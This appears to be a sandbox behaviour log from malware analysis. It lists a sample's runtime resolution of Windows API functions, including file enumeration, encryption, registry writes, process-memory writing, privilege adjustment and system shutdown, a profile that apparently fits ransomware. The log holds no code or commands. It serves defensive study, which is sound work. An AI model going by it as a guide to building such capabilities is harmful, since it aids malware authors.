| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x75a541df |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ConnectNamedPipe, address_out = 0x75a540fb |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x759d5371 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x759d418b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultUILanguage, address_out = 0x759d44ab |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x759f3b92 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x759d1b48 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x759d17d1 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x77ce2c42 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x759d465a |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x759d192e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x759ed4f7 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeNameForVolumeMountPointW, address_out = 0x759e052f |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x759d1986 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x759d4407 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseMutex, address_out = 0x759d111e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77cd2270 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x759d4950 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x759eecbb |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x75a544cf |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x759d1856 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x759d4173 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x759d1282 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x759d54ee |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x77cd22b0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x759d1b18 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x759d4442 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenEventW, address_out = 0x759d15d6 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x759ed4dc |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x759d11a9 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x759d14c9 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x759d4a2d |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x759ed9e0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x759d59e2 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x759d4435 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x759d1462 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x759ec860 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x759d3ed3 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x759d4259 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x759d34c8 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x759d34b0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x759d1222 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x759d492b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x759f8baf |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x759f896c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x759d11c0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x759f735f |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x759d3f5c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x759d424c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ResetEvent, address_out = 0x759d16dd |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x759d1410 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEvent, address_out = 0x759d16c5 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x759d10ff |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x759d183e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x759d1136 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x759d4220 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x759d110c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x759d186e |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetIconInfo, address_out = 0x758e49ea |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DrawIcon, address_out = 0x758e8deb |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = LoadImageW, address_out = 0x758dfbd1 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x758e1218 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77ce25dd |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x758d8a29 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = UnregisterClassW, address_out = 0x758d9f84 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardLayoutList, address_out = 0x758e2e69 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x758e3e75 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharToOemW, address_out = 0x75931a26 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x758d7809 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x758e05ba |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x758d787b |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x758e0b4a |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x758db17d |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongA, address_out = 0x758e6110 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongA, address_out = 0x758dd156 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharUpperW, address_out = 0x758df350 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x758d9a55 |
|
1 | |
| Module | Load | module_name = CRYPT32.dll, base_address = 0x76240000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptImportPublicKeyInfo, address_out = 0x76256c0e |
|
1 | |
| Module | Load | module_name = CRYPT32.dll, base_address = 0x76240000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptDecodeObjectEx, address_out = 0x7624d718 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x7775469d |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x777545f0 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x7776779b |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x77750e0c |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x777540e6 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x77750e24 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x77752a66 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x777540fe |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptVerifySignatureW, address_out = 0x7774c54a |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetNamedSecurityInfoW, address_out = 0x77749fe2 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetNamedSecurityInfoW, address_out = 0x7774f4fd |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x7774df4e |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x7774df36 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorSacl, address_out = 0x77754680 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x777514d6 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x7774df66 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x77754304 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x7775412e |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x77754620 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x7775468d |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x7774c532 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x77751f59 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenThreadToken, address_out = 0x7775432c |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x777546ad |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x7774e124 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x7775431c |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x7774c51a |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x7775418e |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x7775415e |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorSacl, address_out = 0x77754608 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x777541b3 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x7775413b |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x7774cf31 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegFlushKey, address_out = 0x7776773f |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegNotifyChangeKeyValue, address_out = 0x7774e15b |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryInfoKeyW, address_out = 0x777546e7 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyW, address_out = 0x7775445b |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitiateSystemShutdownExW, address_out = 0x7779db3a |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x7774df14 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x76a70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x76a83c71 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x76a70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x76a91e46 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x76a70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76af5708 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x763845bf |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsURLW, address_out = 0x763855bf |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryEmptyW, address_out = 0x763acd81 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpNIW, address_out = 0x76384745 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRenameExtensionW, address_out = 0x763ad32a |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x763846e9 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathMatchSpecW, address_out = 0x763886f7 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathCombineW, address_out = 0x7638c39c |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x76383248 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathAddBackslashW, address_out = 0x7638c177 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfW, address_out = 0x763b066c |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathUnquoteSpacesW, address_out = 0x76385331 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathSkipRootW, address_out = 0x7639fbf5 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7638a1b9 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = SHDeleteValueW, address_out = 0x7637fcca |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfA, address_out = 0x7639edfe |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryW, address_out = 0x7637ff07 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveBackslashW, address_out = 0x76385c62 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = UrlUnescapeA, address_out = 0x7639c6fb |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathQuoteSpacesW, address_out = 0x763ace21 |
|
1 | |
| Module | Load | module_name = PSAPI.DLL, base_address = 0x75ad0000 |
|
1 | |
